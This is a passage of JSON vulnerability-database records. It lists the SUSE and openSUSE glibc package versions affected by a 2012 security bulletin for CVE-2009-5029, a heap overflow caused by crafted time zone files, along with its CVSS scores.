Enterprise Desktop", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "packageName": "glibc-info", "packageFilename": "glibc-info-2.4-31.97.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "packageName": "glibc-i18ndata", "packageFilename": "glibc-i18ndata-2.4-31.97.1.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "packageName": "nscd", "packageFilename": "nscd-2.4-31.97.1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "packageName": "glibc", "packageFilename": "glibc-2.4-31.97.1.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "packageName": "glibc-devel", "packageFilename": "glibc-devel-2.4-31.97.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "packageName": "glibc-devel", "packageFilename": "glibc-devel-2.4-31.97.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "packageName": "glibc-locale", "packageFilename": "glibc-locale-2.4-31.97.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SLE SDK", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "packageName": "glibc-profile", "packageFilename": "glibc-profile-2.4-31.97.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "packageName": "glibc-locale-32bit", "packageFilename": "glibc-locale-32bit-2.4-31.97.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "packageName": "glibc-html", "packageFilename": "glibc-html-2.4-31.97.1.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "packageName": "glibc-locale", "packageFilename": "glibc-locale-2.4-31.97.1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SLE SDK", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "packageName": "glibc-html", "packageFilename": "glibc-html-2.4-31.97.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SLE SDK", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "packageName": "glibc-profile-x86", "packageFilename": "glibc-profile-x86-2.4-31.97.1.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "packageName": "glibc-devel-32bit", "packageFilename": "glibc-devel-32bit-2.4-31.97.1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SLE SDK", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "packageName": "glibc-dceext-x86", "packageFilename": "glibc-dceext-x86-2.4-31.97.1.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "SLE SDK", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "packageName": "glibc-profile", "packageFilename": "glibc-profile-2.4-31.97.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "packageName": "glibc-32bit", "packageFilename": "glibc-32bit-2.4-31.97.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SLE SDK", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "packageName": "glibc-dceext", "packageFilename": "glibc-dceext-2.4-31.97.1.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "packageName": "glibc-devel", "packageFilename": "glibc-devel-2.4-31.97.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "packageName": "glibc-devel", "packageFilename": "glibc-devel-2.4-31.97.1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "packageName": "glibc-profile", "packageFilename": "glibc-profile-2.4-31.97.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "packageName": "glibc", "packageFilename": "glibc-2.4-31.97.1.i686.rpm", "arch": "i686", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "packageName": "glibc-info", "packageFilename": "glibc-info-2.4-31.97.1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "packageName": "glibc-locale-32bit", "packageFilename": "glibc-locale-32bit-2.4-31.97.1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "packageName": "nscd", "packageFilename": "nscd-2.4-31.97.1.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "packageName": "nscd", "packageFilename": "nscd-2.4-31.97.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "packageName": "glibc-64bit", "packageFilename": "glibc-64bit-2.4-31.97.1.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "packageName": "glibc-locale-32bit", "packageFilename": "glibc-locale-32bit-2.4-31.97.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "packageName": "glibc", "packageFilename": "glibc-2.4-31.97.1.i686.rpm", "arch": "i686", "operator": "lt"}, {"OS": "SLE SDK", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "packageName": "glibc-profile-32bit", "packageFilename": "glibc-profile-32bit-2.4-31.97.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "packageName": "glibc-i18ndata", "packageFilename": "glibc-i18ndata-2.4-31.97.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "packageName": "glibc-devel", "packageFilename": "glibc-devel-2.4-31.97.1.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "packageName": "glibc", "packageFilename": "glibc-2.4-31.97.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SLE SDK", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "packageName": "glibc-profile-64bit", "packageFilename": "glibc-profile-64bit-2.4-31.97.1.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "SLE SDK", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "packageName": "glibc-dceext-32bit", "packageFilename": "glibc-dceext-32bit-2.4-31.97.1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "packageName": "glibc-html", "packageFilename": "glibc-html-2.4-31.97.1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "packageName": "glibc-info", "packageFilename": "glibc-info-2.4-31.97.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "packageName": "glibc-html", "packageFilename": "glibc-html-2.4-31.97.1.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "packageName": "glibc-locale-64bit", "packageFilename": "glibc-locale-64bit-2.4-31.97.1.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "packageName": "glibc-html", "packageFilename": "glibc-html-2.4-31.97.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "packageName": "glibc", "packageFilename": "glibc-2.4-31.97.1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "packageName": "glibc-profile", "packageFilename": "glibc-profile-2.4-31.97.1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "packageName": "nscd", "packageFilename": "nscd-2.4-31.97.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "packageName": "glibc-html", "packageFilename": "glibc-html-2.4-31.97.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SLE SDK", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "packageName": "glibc-profile", "packageFilename": "glibc-profile-2.4-31.97.1.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "SLE SDK", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "packageName": "glibc-dceext", "packageFilename": "glibc-dceext-2.4-31.97.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SLE SDK", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "packageName": "glibc-html", "packageFilename": "glibc-html-2.4-31.97.1.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "packageName": "glibc", "packageFilename": "glibc-2.4-31.97.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "packageName": "glibc-i18ndata", "packageFilename": "glibc-i18ndata-2.4-31.97.1.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "packageName": "glibc-locale", "packageFilename": "glibc-locale-2.4-31.97.1.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "packageName": "glibc", "packageFilename": "glibc-2.4-31.97.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SLE SDK", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "packageName": "glibc-dceext", "packageFilename": "glibc-dceext-2.4-31.97.1.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "packageName": "glibc-html", "packageFilename": "glibc-html-2.4-31.97.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "packageName": "glibc-html", "packageFilename": "glibc-html-2.4-31.97.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "packageName": "glibc-locale", "packageFilename": "glibc-locale-2.4-31.97.1.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "SLE SDK", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "packageName": "glibc-dceext", "packageFilename": "glibc-dceext-2.4-31.97.1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "packageName": "nscd", "packageFilename": "nscd-2.4-31.97.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "packageName": "glibc-profile-x86", "packageFilename": "glibc-profile-x86-2.4-31.97.1.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "SLE SDK", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "packageName": "glibc-profile-32bit", "packageFilename": "glibc-profile-32bit-2.4-31.97.1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "packageName": "glibc-devel", "packageFilename": "glibc-devel-2.4-31.97.1.i686.rpm", "arch": "i686", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "packageName": "glibc-profile-32bit", "packageFilename": "glibc-profile-32bit-2.4-31.97.1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "packageName": "glibc-locale", "packageFilename": "glibc-locale-2.4-31.97.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "packageName": "glibc-locale-x86", "packageFilename": "glibc-locale-x86-2.4-31.97.1.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "packageName": "glibc-locale", "packageFilename": "glibc-locale-2.4-31.97.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "packageName": "glibc", "packageFilename": "glibc-2.4-31.97.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "packageName": "glibc-devel-64bit", "packageFilename": "glibc-devel-64bit-2.4-31.97.1.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "SLE SDK", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "packageName": "glibc-dceext-64bit", "packageFilename": "glibc-dceext-64bit-2.4-31.97.1.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "SLE SDK", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "packageName": "glibc-html", "packageFilename": "glibc-html-2.4-31.97.1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "packageName": "glibc-profile-64bit", "packageFilename": "glibc-profile-64bit-2.4-31.97.1.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "packageName": "glibc-32bit", "packageFilename": "glibc-32bit-2.4-31.97.1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "packageName": "glibc-info", "packageFilename": "glibc-info-2.4-31.97.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "packageName": "glibc-i18ndata", "packageFilename": "glibc-i18ndata-2.4-31.97.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "packageName": "glibc-info", "packageFilename": "glibc-info-2.4-31.97.1.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "SLE SDK", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "packageName": "glibc-html", "packageFilename": "glibc-html-2.4-31.97.1.i586.rpm", "arch": "i586", "operator": "lt"}], "description": "The following bug has been fixed:\n\n * Specially crafted time zone files could cause a heap\n overflow in glibc.\n", "edition": 1, "reporter": "Suse", "published": "2012-01-05T12:36:28", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "suse", "title": "Security update for glibc (important)", "bulletinFamily": "unix", "cvelist": ["CVE-2009-5029"], "modified": "2012-01-05T12:36:28", "id": "SUSE-SU-2012:0055-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2012-01/msg00037.html", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-04T12:03:50", "references": [], "affectedPackage": [{"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "2.11.2-3.3.1", "arch": "i686", "packageFilename": "glibc-2.11.2-3.3.1.i686.rpm", "packageName": "glibc", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.10.1-10.9.1", "arch": "i586", "packageFilename": "glibc-obsolete-2.10.1-10.9.1.i586.rpm", "packageName": "glibc-obsolete", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "2.11.2-3.3.1", "arch": "i586", "packageFilename": "glibc-obsolete-2.11.2-3.3.1.i586.rpm", "packageName": "glibc-obsolete", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "2.9-13.11.1", "arch": "ppc64", "packageFilename": "glibc-locale-32bit-2.9-13.11.1.ppc64.rpm", "packageName": "glibc-locale-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.1", "packageVersion": "2.11.1-0.20.1", "arch": "i586", "packageFilename": "glibc-2.11.1-0.20.1.i586.rpm", "packageName": "glibc", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.10.1-10.9.1", "arch": "x86_64", "packageFilename": "glibc-locale-32bit-2.10.1-10.9.1.x86_64.rpm", "packageName": "glibc-locale-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.20.1", "arch": "i686", "packageFilename": "glibc-devel-2.11.1-0.20.1.i686.rpm", "packageName": "glibc-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.20.1", "arch": "ia64", "packageFilename": "nscd-2.11.1-0.20.1.ia64.rpm", "packageName": "nscd", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "2.4-31.77.76.1", "arch": "s390x", "packageFilename": "glibc-2.4-31.77.76.1.s390x.rpm", "packageName": "glibc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.20.1", "arch": "s390x", "packageFilename": "glibc-profile-32bit-2.11.1-0.20.1.s390x.rpm", "packageName": "glibc-profile-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "2.11.2-3.3.1", "arch": "x86_64", "packageFilename": "glibc-locale-2.11.2-3.3.1.x86_64.rpm", "packageName": "glibc-locale", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.20.1", "arch": "x86_64", "packageFilename": "nscd-2.11.1-0.20.1.x86_64.rpm", "packageName": "nscd", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "2.9-2.13.1", "arch": "ppc", "packageFilename": "glibc-locale-2.9-2.13.1.ppc.rpm", "packageName": "glibc-locale", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "2.4-31.77.76.1", "arch": "ia64", "packageFilename": "glibc-profile-x86-2.4-31.77.76.1.ia64.rpm", "packageName": "glibc-profile-x86", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "2.4-31.77.76.1", "arch": "ppc", "packageFilename": "glibc-devel-64bit-2.4-31.77.76.1.ppc.rpm", "packageName": "glibc-devel-64bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11.1", "packageVersion": "2.11.1-0.20.1", "arch": "x86_64", "packageFilename": "glibc-html-2.11.1-0.20.1.x86_64.rpm", "packageName": "glibc-html", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.20.1", "arch": "ppc64", "packageFilename": "glibc-locale-32bit-2.11.1-0.20.1.ppc64.rpm", "packageName": "glibc-locale-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "2.11.2-3.3.1", "arch": "i586", "packageFilename": "nscd-2.11.2-3.3.1.i586.rpm", "packageName": "nscd", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "2.4-31.77.76.1", "arch": "s390x", "packageFilename": "glibc-locale-32bit-2.4-31.77.76.1.s390x.rpm", "packageName": "glibc-locale-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "2.9-13.11.1", "arch": "ppc64", "packageFilename": "glibc-info-2.9-13.11.1.ppc64.rpm", "packageName": "glibc-info", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.10.1-10.9.1", "arch": "x86_64", "packageFilename": "nscd-2.10.1-10.9.1.x86_64.rpm", "packageName": "nscd", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.10.1-10.9.1", "arch": "i686", "packageFilename": "glibc-devel-2.10.1-10.9.1.i686.rpm", "packageName": "glibc-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.10.1-10.9.1", "arch": "x86_64", "packageFilename": "glibc-i18ndata-2.10.1-10.9.1.x86_64.rpm", "packageName": "glibc-i18ndata", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "2.9-2.13.1", "arch": "i586", "packageFilename": "glibc-profile-2.9-2.13.1.i586.rpm", "packageName": "glibc-profile", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "2.4-31.77.76.1", "arch": "x86_64", "packageFilename": "glibc-devel-2.4-31.77.76.1.x86_64.rpm", "packageName": "glibc-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.1", "packageVersion": "2.11.1-0.20.1", "arch": "i586", "packageFilename": "glibc-html-2.11.1-0.20.1.i586.rpm", "packageName": "glibc-html", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "2.11.2-3.3.1", "arch": "x86_64", "packageFilename": "glibc-profile-32bit-2.11.2-3.3.1.x86_64.rpm", "packageName": "glibc-profile-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "2.4-31.77.76.1", "arch": "x86_64", "packageFilename": "glibc-profile-32bit-2.4-31.77.76.1.x86_64.rpm", "packageName": "glibc-profile-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "2.9-2.13.1", "arch": "ppc", "packageFilename": "glibc-64bit-2.9-2.13.1.ppc.rpm", "packageName": "glibc-64bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "2.9-2.13.1", "arch": "x86_64", "packageFilename": "nscd-2.9-2.13.1.x86_64.rpm", "packageName": "nscd", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "2.9-13.11.1", "arch": "ppc64", "packageFilename": "glibc-2.9-13.11.1.ppc64.rpm", "packageName": "glibc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.1", "packageVersion": "2.11.1-0.20.1", "arch": "x86_64", "packageFilename": "glibc-locale-2.11.1-0.20.1.x86_64.rpm", "packageName": "glibc-locale", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.20.1", "arch": "ia64", "packageFilename": "glibc-devel-2.11.1-0.20.1.ia64.rpm", "packageName": "glibc-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "2.9-13.11.1", "arch": "ia64", "packageFilename": "glibc-locale-x86-2.9-13.11.1.ia64.rpm", "packageName": "glibc-locale-x86", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "2.4-31.77.76.1", "arch": "ia64", "packageFilename": "glibc-debuginfo-2.4-31.77.76.1.ia64.rpm", "packageName": "glibc-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "2.9-13.11.1", "arch": "ia64", "packageFilename": "glibc-locale-2.9-13.11.1.ia64.rpm", "packageName": "glibc-locale", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "2.11.2-3.3.1", "arch": "i586", "packageFilename": "glibc-i18ndata-2.11.2-3.3.1.i586.rpm", "packageName": "glibc-i18ndata", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "2.4-31.77.76.1", "arch": "ppc", "packageFilename": "glibc-profile-64bit-2.4-31.77.76.1.ppc.rpm", "packageName": "glibc-profile-64bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "2.9-2.13.1", "arch": "x86_64", "packageFilename": "glibc-32bit-2.9-2.13.1.x86_64.rpm", "packageName": "glibc-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.20.1", "arch": "x86_64", "packageFilename": "glibc-i18ndata-2.11.1-0.20.1.x86_64.rpm", "packageName": "glibc-i18ndata", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "2.4-31.77.76.1", "arch": "x86_64", "packageFilename": "glibc-32bit-2.4-31.77.76.1.x86_64.rpm", "packageName": "glibc-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "2.11.2-3.3.1", "arch": "i586", "packageFilename": "glibc-html-2.11.2-3.3.1.i586.rpm", "packageName": "glibc-html", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "2.9-13.11.1", "arch": "ia64", "packageFilename": "glibc-profile-x86-2.9-13.11.1.ia64.rpm", "packageName": "glibc-profile-x86", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "2.9-2.13.1", "arch": "ppc", "packageFilename": "glibc-locale-64bit-2.9-2.13.1.ppc.rpm", "packageName": "glibc-locale-64bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "2.9-2.13.1", "arch": "i586", "packageFilename": "glibc-2.9-2.13.1.i586.rpm", "packageName": "glibc", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.10.1-10.9.1", "arch": "x86_64", "packageFilename": "glibc-info-2.10.1-10.9.1.x86_64.rpm", "packageName": "glibc-info", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "2.9-2.13.1", "arch": "ppc", "packageFilename": "glibc-profile-64bit-2.9-2.13.1.ppc.rpm", "packageName": "glibc-profile-64bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.1", "packageVersion": "2.11.1-0.20.1", "arch": "x86_64", "packageFilename": "glibc-locale-32bit-2.11.1-0.20.1.x86_64.rpm", "packageName": "glibc-locale-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "2.4-31.77.76.1", "arch": "i586", "packageFilename": "glibc-2.4-31.77.76.1.i586.rpm", "packageName": "glibc", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.10.1-10.9.1", "arch": "i586", "packageFilename": "glibc-devel-2.10.1-10.9.1.i586.rpm", "packageName": "glibc-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "2.9-13.11.1", "arch": "s390x", "packageFilename": "glibc-profile-2.9-13.11.1.s390x.rpm", "packageName": "glibc-profile", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.1", "packageVersion": "2.11.1-0.20.1", "arch": "i586", "packageFilename": "glibc-locale-2.11.1-0.20.1.i586.rpm", "packageName": "glibc-locale", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "2.9-13.11.1", 